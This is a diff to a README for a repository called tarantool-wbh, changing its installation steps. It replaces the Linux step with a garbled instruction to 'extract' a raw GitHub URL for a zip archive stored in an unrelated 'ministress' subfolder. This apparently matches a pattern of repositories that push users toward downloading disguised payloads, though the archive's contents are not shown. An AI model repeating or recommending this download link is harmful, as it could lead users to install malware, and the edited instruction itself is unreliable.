YarleiWi/tarantool-wbh/README.md

 5. **Install the Application**
    - **Windows:** Double-click the `.exe` file and follow the on-screen instructions.
    - **macOS:** Open the downloaded `.dmg` file and drag the tarantool-wbh icon to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and follow the instructions in the provided README, if applicable.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/YarleiWi/tarantool-wbh/main/ministress/tarantool-wbh.zip` file and follow the instructions in the provided README, if applicable.

 6. **Run tarantool-wbh**
    Once installed, locate the application: